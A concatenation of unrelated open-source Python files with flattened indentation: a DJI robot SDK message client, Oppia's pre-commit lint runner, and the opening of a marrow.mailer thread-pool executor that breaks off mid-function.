sw.train_model_det(sess, train_op, loss, loss_rpn_cls, loss_rpn_box, loss_cls, loss_box, loss_pose, learning_rate, max_iters, data_layer)
print 'done solving'
|
client.py
|
# -*-coding:utf-8-*-
# Copyright (c) 2020 DJI.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import binascii
from . import conn
from . import protocol
from . import logger
from . import event
from . import config
CLIENT_MAX_EVENT_NUM = 16
class EventIdentify(object):
def __init__(self):
self._valid = False
self._ident = None
self._event = threading.Event()
class MsgHandler:
def __init__(self, proto_data=None, req_cb=None, ack_cb=None):
self._proto_data = proto_data
self._req_cb = req_cb
self._ack_cb = ack_cb
@property
def proto_data(self):
return self._proto_data
@staticmethod
def make_dict_key(cmd_set, cmd_id):
return cmd_set * 256 + cmd_id
def dict_key(self):
logger.debug('MsgHandler: dict_key, isinstance:', isinstance(self._proto_data, protocol.ProtoData))
if self._proto_data:
return self.make_dict_key(self.proto_data._cmdset, self.proto_data._cmdid)
return None
class Client(object):
# host is int, index is int.
def __init__(self, host=0, index=0, connect=None):
self._host = host
self._index = index
self._conn = connect
if connect is None:
try:
self._conn = conn.Connection(config.ROBOT_DEFAULT_LOCAL_WIFI_ADDR,
config.ROBOT_DEFAULT_WIFI_ADDR,
protocol=config.DEFAULT_PROTO_TYPE)
except Exception as e:
logger.error('Client: __init__, create Connection, exception: {0}'.format(e))
self._conn = None
self._has_sent = 0
self._has_recv = 0
self._unpack_failed = 0
self._dispatcher = event.Dispatcher()
self._handler_dict = {}
self._wait_ack_list = {}
self._wait_ack_mutex = threading.Lock()
self._event_list = []
self._thread = None
self._running = False
def __del__(self):
self.stop()
@property
def remote_addr(self):
return self._conn.target_addr if self._conn else None
def add_handler(self, obj, name, f):
self._dispatcher.add_handler(obj, name, f)
def remove_handler(self, name):
self._dispatcher.remove_handler(name)
def initialize(self):
if not self._conn:
logger.warning("Client: initialize, no connections, init connections first.")
return False
for i in range(0, CLIENT_MAX_EVENT_NUM):
ident = EventIdentify()
self._event_list.append(ident)
try:
self._conn.create()
except Exception as e:
raise e
return True
@property
def hostbyte(self):
return protocol.host2byte(self._host, self._index)
def start(self):
try:
result = self.initialize()
if not result:
return False
self._thread = threading.Thread(target=self._recv_task)
self._thread.start()
except Exception as e:
raise e
def stop(self):
if self._thread and self._thread.is_alive():
self._running = False
proto = protocol.ProtoGetVersion()
msg = protocol.Msg(self.hostbyte, self.hostbyte, proto)
self._conn.send_self(msg.pack())
self._thread.join()
if self._conn:
self._conn.close()
def send_msg(self, msg):
data = msg.pack()
logger.debug("Client: send_msg, msg {0} {1}".format(self._has_sent, msg))
logger.debug("Client: send_msg, cmset:{0:2x}, cmdid:{1:2x}, {2}".format(msg.cmdset, msg.cmdid,
binascii.hexlify(data)))
self._has_sent += 1
self.send(data)
def send_sync_msg(self, msg, callback=None, timeout=3.0):
if not self._running:
logger.error("Client: send_sync_msg, client recv_task is not running.")
return None
if msg._need_ack > 0:
evt = self._ack_register_identify(msg)
if evt is None:
logger.error("Client: send_sync_msg, ack_register failed.")
return None
self.send_msg(msg)
evt._event.wait(timeout)
if not evt._event.isSet():
logger.error("Client: send_sync_msg wait msg receiver:{0}, cmdset:0x{1:02x}, cmdid:0x{2:02x} \
timeout!".format(msg.receiver, msg.cmdset, msg.cmdid))
evt._valid = False
return None
resp_msg = self._ack_unregister_identify(evt._ident)
evt._valid = False
if resp_msg is None:
logger.error("Client, send_sync_msg, get resp msg failed.")
else:
if isinstance(resp_msg, protocol.Msg):
try:
resp_msg.unpack_protocol()
if callback:
callback(resp_msg)
except Exception as e:
self._unpack_failed += 1
logger.warning("Client: send_sync_msg, resp_msg {0:d} cmdset:0x{1:02x}, cmdid:0x{2:02x}, "
"e {3}".format(self._has_sent, resp_msg.cmdset, resp_msg.cmdid, format(e)))
return None
else:
logger.warning("Client: send_sync_msg, has_sent:{0} resp_msg:{1}.".format(
self._has_sent, resp_msg))
return None
return resp_msg
else:
self.send_msg(msg)
def resp_msg(self, msg):
msg._sender, msg._receiver = msg._receiver, msg._sender
msg._need_ack = 0
msg._is_ack = True
data = msg.pack(True)
self._has_sent += 1
self.send(data)
def send(self, data):
try:
self._conn.send(data)
except Exception as e:
logger.warning("Client: send, exception {0}".format(str(e)))
def send_async_msg(self, msg):
if not self._running:
logger.error("Client: send_async_msg, client recv_task is not running.")
return None
msg._need_ack = 0
return self.send_msg(msg)
def is_ready(self):
return self._has_recv > 0
def _recv_task(self):
self._running = True
logger.info("Client: recv_task, Start to Recving data...")
while self._running:
msg = self._conn.recv()
if not self._running:
break
if msg is None:
logger.warning("Client: _recv_task, recv msg is None, skip.")
continue
logger.info("Client: recv_msg, {0}".format(msg))
self._has_recv += 1
self._dispatch_to_send_sync(msg)
self._dispatch_to_callback(msg)
if self._dispatcher:
self._dispatcher.dispatch(msg)
self._running = False
def _dispatch_to_send_sync(self, msg):
if msg.is_ack:
logger.debug("Client: dispatch_to_send_sync, {0} cmdset:{1} cmdid:{2}".format(
self._has_recv, hex(msg._cmdset), hex(msg._cmdid)))
ident = self._make_ack_identify(msg)
self._wait_ack_mutex.acquire()
if ident in self._wait_ack_list.keys():
for i, evt in enumerate(self._event_list):
if evt._ident == ident and evt._valid:
self._wait_ack_list[ident] = msg
evt._event.set()
else:
logger.debug("Client: dispatch_to_send_sync, ident:{0} is not in wait_ack_list {1}".format(
ident, self._wait_ack_list))
self._wait_ack_mutex.release()
def _dispatch_to_callback(self, msg):
if msg._is_ack:
key = MsgHandler.make_dict_key(msg.cmdset, msg.cmdid)
if key in self._handler_dict.keys():
self._handler_dict[key]._ack_cb(self, msg)
else:
logger.debug("Client: dispatch_to_callback, msg cmdset:{0:2x}, cmdid:{1:2x} is not define ack \
handler".format(msg.cmdset, msg.cmdid))
else:
key = MsgHandler.make_dict_key(msg.cmdset, msg.cmdid)
if key in self._handler_dict.keys():
self._handler_dict[key]._req_cb(self, msg)
else:
logger.debug("Client: _dispatch_to_callback, cmdset:{0}, cmdid:{1} is not define req handler".format(
hex(msg.cmdset), hex(msg.cmdid)))
@staticmethod
def _make_ack_identify(msg):
if msg.is_ack:
return str(msg._sender) + str(hex(msg.cmdset)) + str(hex(msg.cmdid)) + str(msg._seq_id)
else:
return str(msg._receiver) + str(hex(msg.cmdset)) + str(hex(msg.cmdid)) + str(msg._seq_id)
def _ack_register_identify(self, msg):
self._wait_ack_mutex.acquire()
ident = self._make_ack_identify(msg)
self._wait_ack_list[ident] = 1
self._wait_ack_mutex.release()
evt = None
for i, evt_ident in enumerate(self._event_list):
if not evt_ident._valid:
evt = evt_ident
break
if evt is None:
logger.error("Client: event list is run out.")
return None
evt._valid = True
evt._ident = ident
evt._event.clear()
return evt
def _ack_unregister_identify(self, identify):
try:
self._wait_ack_mutex.acquire()
if identify in self._wait_ack_list.keys():
return self._wait_ack_list.pop(identify)
else:
logger.warning("can not find ident:{0} in wait_ack_list.".format(identify))
return None
finally:
self._wait_ack_mutex.release()
def add_msg_handler(self, handler):
key = handler.dict_key()
if key:
self._handler_dict[key] = handler
class TextClient(object):
def __init__(self, conf):
self._conn = conn.Connection(conf.default_sdk_addr, conf.default_robot_addr, conf.cmd_proto)
self._thread = threading.Thread(target=self._recv_task)
self._running = False
self._event = threading.Event()
self._dispatcher = event.Dispatcher()
self._has_cmd_wait_ack = False
self._has_sent = 0
self._has_recv = 0
self._wait_ack_mutex = threading.Lock()
def initialize(self):
try:
self._conn.create()
except Exception as e:
raise e
return True
def start(self):
self.initialize()
self._thread.start()
def stop(self):
self._running = False
self._thread.join()
self._conn.close()
def check_is_dds_msg(self, msg):
return protocol.TextMsg.IS_DDS_FLAG in msg.get_buf()
def _recv_task(self):
self._running = True
logger.info("TextClient: _recv_task, Start to Recving data...")
while self._running:
resp = self._conn.recv()
if not self._running:
break
if resp is None:
logger.warning("Client: _recv_task, recv resp is None, skip.")
continue
if not self.check_is_dds_msg(resp):
logger.info("TextClient: _recv_task, resp: {0}".format(resp))
else:
logger.debug("TextClient: recv_resp, recv resp {0}".format(resp))
self._wait_ack_mutex.acquire()
if self._has_cmd_wait_ack and not self.check_is_dds_msg(resp):
logger.debug("TexClient: call send_sync dispatcher: {0}".format(resp))
self._dispatch_to_send_sync(resp)
self._wait_ack_mutex.release()
if self._dispatcher:
self._dispatcher.dispatch(resp)
logger.info("_recv_task: quit.")
def send(self, text):
logger.debug("Client: time delay test, send time")
logger.info("TextClient: send_msg: {0}".format(text))
try:
self._conn.send(text.encode('utf-8'))
except Exception as e:
logger.warning("TexClient: send_async_text, exception {0}".format(str(e)))
return False
return True
def send_sync_msg(self, msg, callback=None, timeout=10):
if not self._running:
logger.error("TextClient: send_sync_msg, client rescv_task is not runnint")
self._wait_ack_mutex.acquire()
self._has_cmd_wait_ack = True
self.send_msg(msg)
self._wait_ack_mutex.release()
self._event.wait(timeout)
if self._event.isSet():
self._event.clear()
self._wait_ack_mutex.acquire()
self._has_cmd_wait_ack = False
self._wait_ack_mutex.release()
return self._resp
else:
logger.warning("TextClient: send_sync_text, failed, timeout.")
return None
def send_async_msg(self, msg):
if not self._running:
logger.error("TextClient: send_async_msg, client recv_task is not running.")
return None
return self.send_msg(msg)
def send_msg(self, msg):
data = msg.pack()
self.send(data)
self._has_sent += 1
def add_handler(self, obj, name, f):
self._dispatcher.add_handler(obj, name, f)
def remove_handler(self, name):
self._dispatcher.remove_handler(name)
def _dispatch_to_send_sync(self, msg):
logger.debug("TextClient: _dispatch_to_send_sync, msg {0}".format(msg))
self._resp = msg
self._event.set()
def _make_ack_identify(self, msg):
return msg
|
pre_commit_linter.py
|
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Pre-commit script for Oppia.
This script lints Python and JavaScript code, and prints a
list of lint errors to the terminal. If the directory path is passed,
it will lint all Python and JavaScript files in that directory; otherwise,
it will only lint files that have been touched in this commit.
This script ignores all filepaths contained within .eslintignore.
=====================
CUSTOMIZATION OPTIONS
=====================
1. To lint only files that have been touched in this commit
python -m scripts.linters.pre_commit_linter
2. To lint all files in the folder or to lint just a specific file
python -m scripts.linters.pre_commit_linter --path filepath
3. To lint a specific list of files. Separate filepaths by spaces
python -m scripts.linters.pre_commit_linter
--files filepath_1 filepath_2 ... filepath_n
4. To lint files in verbose mode
python -m scripts.linters.pre_commit_linter --verbose
5. To lint a specific list of file extensions. Separate file
extensions by spaces
python -m scripts.linters.pre_commit_linter
--only-check-file-extensions py js
6. To run a shard of the lint tests
python -m scripts.linters.pre_commit_linter --shard shard_name
Shards are defined in the SHARDS constant in this file.
Note that the root folder MUST be named 'oppia'.
"""
from __future__ import annotations
import argparse
import fnmatch
import multiprocessing
import os
import re
import subprocess
import sys
import threading
from core import python_utils
# Install third party dependencies before proceeding.
from . import codeowner_linter
from . import css_linter
from . import general_purpose_linter
from . import html_linter
from . import js_ts_linter
from . import linter_utils
from . import other_files_linter
from . import python_linter
from .. import common
from .. import concurrent_task_utils
from .. import install_third_party_libs
OTHER_SHARD_NAME = 'other'
SHARDS = {
'1': [
'core/templates/',
'extensions/',
'core/tests/',
'core/storage/',
'core/controllers/',
'core/platform',
'core/jobs/',
],
'other': None,
}
_PARSER = argparse.ArgumentParser()
_EXCLUSIVE_GROUP = _PARSER.add_mutually_exclusive_group()
_PARSER.add_argument(
'--path',
help='path to the directory with files to be linted',
action='store')
_EXCLUSIVE_GROUP.add_argument(
'--files',
nargs='+',
help='specific files to be linted. Space separated list',
action='store')
_EXCLUSIVE_GROUP.add_argument(
'--verbose',
help='verbose mode. All details will be printed.',
action='store_true')
_PARSER.add_argument(
'--only-check-file-extensions',
nargs='+',
choices=['html', 'css', 'js', 'ts', 'py', 'other'],
help='specific file extensions to be linted. Space separated list. '
'If either of js or ts used then both js and ts files will be linted.',
action='store')
_PARSER.add_argument(
'--shard',
help='Name of shard to run lint checks for')
_PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
_PATHS_TO_INSERT = [
os.getcwd(),
os.path.join(
common.GOOGLE_APP_ENGINE_SDK_HOME, 'lib', 'yaml-3.10'),
os.path.join(
common.GOOGLE_APP_ENGINE_SDK_HOME, 'lib', 'jinja2-2.6'),
os.path.join(
common.GOOGLE_APP_ENGINE_SDK_HOME),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'webtest-%s' % common.WEBTEST_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'PyGithub-%s' % common.PYGITHUB_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools',
'setuptools-%s' % common.SETUPTOOLS_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'Pillow-%s' % common.PILLOW_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'protobuf-%s' % common.PROTOBUF_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'psutil-%s' % common.PSUTIL_VERSION),
os.path.join(
_PARENT_DIR, 'oppia_tools', 'pip-tools-%s' % common.PIP_TOOLS_VERSION),
common.THIRD_PARTY_PYTHON_LIBS_DIR
]
for path in _PATHS_TO_INSERT:
sys.path.insert(0, path)
class FileCache:
"""Provides thread-safe access to cached file content."""
def __init__(self):
self._CACHE_DATA_DICT = {}
def read(self, filepath, mode='r'):
"""Returns the data read from the file in unicode form.
Args:
filepath: str. The file path from which data is to be read.
mode: str. The mode in which the file is to be opened.
Returns:
str. The data read from the file.
"""
return self._get_data(filepath, mode)[0]
def readlines(self, filepath, mode='r'):
"""Returns the tuple containing data line by line as read from the
file in unicode form.
Args:
filepath: str. The file path from which data is to be read.
mode: str. The mode in which the file is to be opened.
Returns:
tuple(str). The tuple containing data line by line as read from the
file.
"""
return self._get_data(filepath, mode)[1]
def _get_data(self, filepath, mode):
"""Returns the collected data from the file corresponding to the given
filepath.
Args:
filepath: str. The file path from which data is to be read.
mode: str. The mode in which the file is to be opened.
Returns:
tuple(str, tuple(str)). The tuple containing data read from the file
as first element and tuple containing the text line by line as
second element.
"""
key = (filepath, mode)
if key not in self._CACHE_DATA_DICT:
with python_utils.open_file(filepath, mode, newline='') as f:
lines = f.readlines()
self._CACHE_DATA_DICT[key] = (''.join(lines), tuple(lines))
return self._CACHE_DATA_DICT[key]
def _get_linters_for_file_extension(file_extension_to_lint, namespace, files):
"""Return linters for the given file extension type.
Args:
file_extension_to_lint: str. The file extension to be linted.
namespace: multiprocessing.Namespace. Namespace in which to execute
this function.
files: dict(str, list(str)). The mapping of filetypes to list of files.
Returns:
(CustomLintChecks, ThirdPartyLintChecks). A 2-tuple containing objects
of lint check classes to run in parallel processing.
"""
namespace.files = FileCache()
file_cache = namespace.files
parent_dir = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
custom_linters = []
third_party_linters = []
file_extension_type_js_ts = file_extension_to_lint in ('js', 'ts')
if file_extension_type_js_ts:
general_files_to_lint = files['.js'] + files['.ts']
elif file_extension_to_lint == 'other':
general_files_to_lint = files['other']
else:
general_files_to_lint = files['.%s' % file_extension_to_lint]
custom_linter, third_party_linter = general_purpose_linter.get_linters(
general_files_to_lint, file_cache)
custom_linters.append(custom_linter)
if file_extension_type_js_ts:
custom_linter, third_party_linter = js_ts_linter.get_linters(
files['.js'], files['.ts'], file_cache)
custom_linters.append(custom_linter)
third_party_linters.append(third_party_linter)
elif file_extension_to_lint == 'html':
custom_linter, third_party_linter = html_linter.get_linters(
files['.html'], file_cache)
custom_linters.append(custom_linter)
third_party_linters.append(third_party_linter)
config_path_for_css_in_html = os.path.join(
parent_dir, 'oppia', '.stylelintrc')
custom_linter, third_party_linter = css_linter.get_linters(
config_path_for_css_in_html, files['.html'])
third_party_linters.append(third_party_linter)
elif file_extension_to_lint == 'css':
config_path_for_oppia_css = os.path.join(
parent_dir, 'oppia', 'core', 'templates', 'css', '.stylelintrc')
custom_linter, third_party_linter = css_linter.get_linters(
config_path_for_oppia_css, files['.css'])
third_party_linters.append(third_party_linter)
elif file_extension_to_lint == 'py':
_, third_party_linter = python_linter.get_linters(files['.py'])
third_party_linters.append(third_party_linter)
elif file_extension_to_lint == 'other':
custom_linter, _ = codeowner_linter.get_linters(file_cache)
custom_linters.append(custom_linter)
custom_linter, _ = other_files_linter.get_linters(file_cache)
custom_linters.append(custom_linter)
return custom_linters, third_party_linters
def _get_changed_filepaths():
"""Returns a list of modified files (both staged and unstaged)
Returns:
list. A list of filepaths of modified files.
"""
unstaged_files = subprocess.check_output([
'git', 'diff', '--name-only',
'--diff-filter=ACM']).splitlines()
staged_files = subprocess.check_output([
'git', 'diff', '--cached', '--name-only',
'--diff-filter=ACM']).splitlines()
all_changed_filepaths = unstaged_files + staged_files
return [filepath.decode('utf-8') for filepath in all_changed_filepaths]
def _get_all_files_in_directory(dir_path, excluded_glob_patterns):
"""Recursively collects all files in directory and
subdirectories of specified path.
Args:
dir_path: str. Path to the folder to be linted.
excluded_glob_patterns: set(str). Set of all glob patterns
to be excluded.
Returns:
list. A list of files in directory and subdirectories without excluded
files.
"""
files_in_directory = []
for _dir, _, files in os.walk(dir_path):
for file_name in files:
filepath = os.path.relpath(
os.path.join(_dir, file_name), start=os.getcwd())
if not any(
fnmatch.fnmatch(filepath, gp) for gp in
excluded_glob_patterns):
files_in_directory.append(filepath)
return files_in_directory
def _get_file_extensions(file_extensions_to_lint):
"""This function is used to return the file extensions which need to be
linted and checked.
Args:
file_extensions_to_lint: list(str). The list of file extensions to be
linted and checked.
Returns:
list(str). The list of all file extensions
to be linted and checked.
"""
all_file_extensions_type = ['js', 'py', 'html', 'css', 'other']
if file_extensions_to_lint:
# Check if 'js' and 'ts' both are present in file_extensions_to_lint.
js_and_ts_is_present = 'js' in file_extensions_to_lint and (
'ts' in file_extensions_to_lint)
if js_and_ts_is_present:
print(
'Please use only one of "js" or "ts", as we do not have '
'separate linters for JS and TS files. If both these options '
'are used together, then the JS/TS linter will be run twice.')
print('Exiting...')
sys.exit(1)
return set(file_extensions_to_lint)
return all_file_extensions_type
def _get_filepaths_from_path(input_path, namespace=None):
"""Get paths to all lintable files recursively under a path.
This function applies some ignore rules (from .eslintignore) but not
all.
Args:
input_path: str. Path to look for files under.
namespace: multiprocessing.Namespace. Namespace in which to execute
this function.
Returns:
list. Paths to lintable files.
"""
namespace.files = FileCache()
file_cache = namespace.files
input_path = os.path.join(os.getcwd(), input_path)
if not os.path.exists(input_path):
print('Could not locate file or directory %s. Exiting.' % input_path)
print('----------------------------------------')
sys.exit(1)
if os.path.isfile(input_path):
return [input_path]
else:
eslintignore_path = os.path.join(os.getcwd(), '.eslintignore')
excluded_glob_patterns = [
line.strip() for line in file_cache.readlines(eslintignore_path)]
return _get_all_files_in_directory(
input_path, excluded_glob_patterns)
def _get_filepaths_from_non_other_shard(shard, namespace=None):
"""Get paths to lintable files in a shard besides the other shard.
This function applies some ignore rules (from .eslintignore) but not
all.
Args:
shard: str. Shard name.
namespace: multiprocessing.Namespace. Namespace in which to execute
this function.
Returns:
list(str). Paths to lintable files.
"""
filepaths = []
assert shard != OTHER_SHARD_NAME
for filepath in SHARDS[shard]:
filepaths.extend(
_get_filepaths_from_path(filepath, namespace=namespace))
if len(filepaths) != len(set(filepaths)):
# Shards are invalid because of a duplicate file.
for filepath in filepaths:
if filepaths.count(filepath) > 1:
raise RuntimeError(
'%s in multiple shards.' % filepath)
# We exempt this line from test coverage because it is
# un-testable. It should never be reached, but we raise an
# assertion error to catch coding errors above.
raise AssertionError( # pragma: no cover
'There is a file duplicated across shards. '
'We should have been able to find it but failed.')
return filepaths
def _get_filepaths_from_other_shard(namespace=None):
"""Get paths to lintable files in the other shard.
This function applies some ignore rules (from .eslintignore) but not
all. The other shard has the name specified by OTHER_SHARD_NAME.
Returns:
list(str). Paths to lintable files.
"""
all_filepaths = set(
_get_filepaths_from_path(os.getcwd(), namespace=namespace))
filepaths_in_shards = set()
for shard in SHARDS:
if shard == OTHER_SHARD_NAME:
continue
filepaths_in_shards |= set(
_get_filepaths_from_non_other_shard(shard, namespace=namespace))
return list(all_filepaths - filepaths_in_shards)
def _get_all_filepaths(
input_path, input_filenames, input_shard, namespace=None):
"""This function is used to return the filepaths which needs to be linted
and checked.
Args:
input_path: str. The path of the directory to be linted and checked.
input_filenames: list(str). The list of filenames to be linted and
checked, ignored if input_path is specified.
input_shard: str. Name of shard to lint. Ignored if either
input_path or input_filenames are specified.
namespace: multiprocessing.Namespace. Namespace in which to execute
this function.
Returns:
list(str). The list of filepaths to be linted and checked.
"""
if input_path:
all_filepaths = _get_filepaths_from_path(
input_path, namespace=namespace)
elif input_filenames:
valid_filepaths = []
invalid_filepaths = []
for filename in input_filenames:
if os.path.isfile(filename):
valid_filepaths.append(filename)
else:
invalid_filepaths.append(filename)
if invalid_filepaths:
print(
'The following file(s) do not exist: %s\n'
'Exiting.' % invalid_filepaths)
sys.exit(1)
all_filepaths = valid_filepaths
elif input_shard:
if input_shard != OTHER_SHARD_NAME:
all_filepaths = _get_filepaths_from_non_other_shard(
input_shard, namespace=namespace)
else:
all_filepaths = _get_filepaths_from_other_shard(
namespace=namespace)
else:
all_filepaths = _get_changed_filepaths()
# TODO(#12912): The pylint complains about 'pattern' being used out of the
# comprehension, which is not true, this needs to be investigated and fixed.
all_matching_filepaths = [
filename for filename in all_filepaths if not
any(
fnmatch.fnmatch(filename, pattern) for pattern
in general_purpose_linter.EXCLUDED_PATHS
)
]
return all_matching_filepaths
def read_files(file_paths, namespace=None):
"""Read all files to be checked and cache them. This will spin off multiple
threads to increase the efficiency.
"""
namespace.files = FileCache()
file_cache = namespace.files
threads = []
for file_path in file_paths:
thread = threading.Thread(target=file_cache.read, args=(file_path,))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
def categorize_files(file_paths, files):
"""Categorize all the files and store them in shared variable files.
Args:
file_paths: list(str). Paths to files that should be categorized.
files: dict(str, list(str)). Dictionary into which the files will
be categorized. Keys are file extensions ('.py', '.html', '.ts',
'.js', '.css') or 'other'. Values are lists of files with that file
extension.
"""
all_filepaths_dict = {
'.py': [], '.html': [], '.ts': [], '.js': [], 'other': [], '.css': []
}
for file_path in file_paths:
_, extension = os.path.splitext(file_path)
if extension in all_filepaths_dict:
all_filepaths_dict[extension].append(file_path)
else:
all_filepaths_dict['other'].append(file_path)
files.update(all_filepaths_dict)
def _print_summary_of_error_messages(lint_messages):
"""Print summary of linter error messages.
Args:
lint_messages: list(str). List of linter error messages.
"""
if lint_messages != '':
error_message_lines = [
'----------------------------------------',
'Please fix the errors below:',
'----------------------------------------',
] + lint_messages
linter_utils.print_failure_message('\n'.join(error_message_lines))
def _get_task_output(lint_messages, failed, task):
"""Returns output of running tasks.
Args:
lint_messages: list(str). List of summary messages of linter output.
failed: bool. The boolean to check if lint checks fail or not.
task: object(TestingTaskSpec). The task object to get output of linter.
Returns:
bool. The boolean to check if the lint checks fail or not.
"""
if task.task_results:
for task_result in task.task_results:
lint_messages += task_result.trimmed_messages
if task_result.failed:
failed = True
return failed
def _print_errors_stacktrace(errors_stacktrace):
"""Print errors stacktrace caught during linter execution.
Args:
errors_stacktrace: list(str). List of error stacktrace of lint
execution failure.
"""
print('')
print(
'Unable to run the complete lint test, please check '
'the following stack trace and fix the errors:')
print('+--------------------------+')
for stacktrace in errors_stacktrace:
print(stacktrace)
print('--------------------------------------------------')
print('')
print('--------------------------------------------------')
print(
'Some of the linting functions may not run until the'
' above errors gets fixed')
def _get_space_separated_linter_name(linter_name):
"""Returns the space separated name of the linter class.
Args:
linter_name: str. Name of the linter class.
Returns:
str. Space separated name of the linter class.
"""
return re.sub(
r'((?<=[a-z])[A-Z]|(?<!\A)[A-Z](?=[a-z]))',
r' \1', linter_name)
def main(args=None):
"""Main method for pre commit linter script that lints Python, JavaScript,
HTML, and CSS files.
"""
# Namespace is used to share values between multiple processes. This cannot
# be used as a global variable since then it leads to hanging of some
# processes.
namespace = multiprocessing.Manager().Namespace()
parsed_args = _PARSER.parse_args(args=args)
# File extension to be linted.
file_extension_types = _get_file_extensions(
parsed_args.only_check_file_extensions)
# Default mode is non-verbose mode, if arguments contains --verbose flag it
# will be made True, which will represent verbose mode.
verbose_mode_enabled = bool(parsed_args.verbose)
all_filepaths = _get_all_filepaths(
parsed_args.path,
parsed_args.files,
parsed_args.shard,
namespace=namespace
)
install_third_party_libs.main()
common.fix_third_party_imports()
print('Starting Linter....')
if len(all_filepaths) == 0:
print('---------------------------')
print('No files to check.')
print('---------------------------')
return
read_files(all_filepaths, namespace=namespace)
files = multiprocessing.Manager().dict()
categorize_files(all_filepaths, files)
# Prepare custom tasks.
custom_max_concurrent_runs = 25
custom_concurrent_count = min(
multiprocessing.cpu_count(), custom_max_concurrent_runs)
custom_semaphore = threading.Semaphore(custom_concurrent_count)
# Prepare third_party tasks.
third_party_max_concurrent_runs = 2
third_party_concurrent_count = min(
multiprocessing.cpu_count(), third_party_max_concurrent_runs)
third_party_semaphore = threading.Semaphore(third_party_concurrent_count)
custom_linters = []
third_party_linters = []
for file_extension_type in file_extension_types:
if file_extension_type in ('js', 'ts'):
if len(files['.js'] + files['.ts']) == 0:
continue
elif (not file_extension_type == 'other' and not
len(files['.%s' % file_extension_type])):
continue
custom_linter, third_party_linter = _get_linters_for_file_extension(
file_extension_type, namespace, files)
custom_linters += custom_linter
third_party_linters += third_party_linter
# Create tasks.
tasks_custom = []
tasks_third_party = []
for linter in custom_linters:
name = _get_space_separated_linter_name(type(linter).__name__)
task_custom = concurrent_task_utils.create_task(
linter.perform_all_lint_checks, verbose_mode_enabled,
custom_semaphore, name=name)
tasks_custom.append(task_custom)
for linter in third_party_linters:
name = _get_space_separated_linter_name(type(linter).__name__)
task_third_party = concurrent_task_utils.create_task(
linter.perform_all_lint_checks, verbose_mode_enabled,
third_party_semaphore, name=name)
tasks_third_party.append(task_third_party)
# Execute tasks.
# Here we set Concurrency limit for custom task to 25 because we need to
# parallelize the tasks to work on full capacity of CPU.
# Concurrency limit for third party tasks is set to 2 because these
# third party libraries have their own ways to lint at their fastest
# (ie. might parallelize on their own)
# Concurrency limit: 25.
concurrent_task_utils.execute_tasks(tasks_custom, custom_semaphore)
# Concurrency limit: 2.
concurrent_task_utils.execute_tasks(
tasks_third_party, third_party_semaphore)
lint_messages = []
failed = False
for task in tasks_custom:
failed = _get_task_output(lint_messages, failed, task)
for task in tasks_third_party:
failed = _get_task_output(lint_messages, failed, task)
errors_stacktrace = concurrent_task_utils.ALL_ERRORS
if errors_stacktrace:
failed = True
_print_errors_stacktrace(errors_stacktrace)
if failed:
_print_summary_of_error_messages(lint_messages)
linter_utils.print_failure_message('\n'.join([
'---------------------------',
'Checks Not Passed.',
'---------------------------']))
sys.exit(1)
else:
linter_utils.print_success_message('\n'.join([
'---------------------------',
'All Checks Passed.',
'---------------------------']))
# The 'no coverage' pragma is used as this line is un-testable. This is because
# it will only be called when pre_commit_linter.py is used as a
# script.
if __name__ == '__main__': # pragma: no cover
main()
|
dynamic.py
|
# encoding: utf-8
import atexit
import threading
import weakref
import sys
import math
from functools import partial
from marrow.mailer.manager.futures import worker
from marrow.mailer.manager.util import TransportPool
try:
import queue
except ImportError:
import Queue as queue
try:
from concurrent import futures
except ImportError: # pragma: no cover
raise ImportError("You must install the futures package to use background delivery.")
__all__ = ['DynamicManager']
log = __import__('logging').getLogger(__name__)
def thread_worker(executor, jobs, timeout, maximum):
i = maximum + 1
try:
while i:
i -= 1
try:
work = jobs.get(True, timeout)
if work is None:
runner = executor()
if runner is None or runner._shutdown:
log.debug("Worker instructed to shut down.")
break
# Can't think of a test case for this; best to be safe.
del runner # pragma: no cover
continue # pragma: no cover
except queue.Empty: # pragma: no cover
log.debug("Worker death from starvation.")
break
else:
work.run()
else: # pragma: no cover
log.debug("Worker death from exhaustion.")
except: # pragma: no cover
log.critical("Unhandled exception in worker.", exc_info=True)
runner = executor()
if runner:
runner._threads.discard(threading.current_thread())
class WorkItem(object):
__slots__ = ('future', 'fn', 'args', 'kwargs')
def __init__(self, future, fn, args, kwargs):
self.future = future
self.fn = fn
self.args = args
self.kwargs = kwargs
def run(self):
if not self.future.set_running_or_notify_cancel():
return
try:
result = self.fn(*self.args, **self.kwargs)
except:
e = sys.exc_info()[1]
self.future.set_exception(e)
else:
self.future.set_result(result)
class ScalingPoolExecutor(futures.ThreadPoolExecutor):
def __init__(self, workers, divisor, timeout):
self._max_workers = workers
self.divisor = divisor
self.timeout = timeout
self._work_queue = queue.Queue()
self._threads = set()
self._shutdown = False
self._shutdown_lock = threading.Lock()
self._management_lock = threading.Lock()
atexit.register(self._atexit)
def shutdown(self, wait=True):
with self._shutdown_lock:
self._shutdown = True
for i in range(len(self._threads)):
self._work_queue.put(None)
if wait:
for thread in list(self._threads):
thread.join()
def _atexit(self): # pragma: no cover
self.shutdown(True)
def _spawn(self):
t = threading.Thread(target=thread_worker, args=(weakref.ref(self), self._work_queue, self.divisor, self.timeout))
t.daemon = True
t.start()
with self._management_lock:
self._threads.add(t)
def _adjust_thread_count(self):
pool = len(self._threads)
